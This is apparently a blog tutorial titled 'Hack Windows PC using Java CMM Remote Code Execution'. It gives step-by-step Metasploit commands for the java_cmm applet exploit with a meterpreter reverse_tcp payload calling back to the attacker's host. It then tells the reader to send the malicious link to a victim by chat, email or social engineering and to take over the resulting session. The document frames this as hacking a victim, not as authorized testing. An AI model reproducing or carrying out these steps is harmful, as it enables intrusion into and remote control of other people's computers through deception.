Categories

Archives

Kali Linux, Penetration Testing

Hack Windows PC using Java CMM Remote Code Execution

This module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn’t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

Exploit Targets

Java 7 Update 15

Windows PC

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_cmm

msf exploit (java_cmm)>set payload windows/meterpreter/reverse_tcp

msf exploit (java_cmm)>set lhost 192.168.0.108 (IP of Local Host)

msf exploit (java_cmm)>set srvhost 192.168.0.108 (This must be an address on the local machine)

msf exploit (java_cmm)>set uripath / (The Url to use for this exploit)

msf exploit (java_cmm)>exploit 

Now an URL you should give to your victim http://192.168.0.108:8080

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“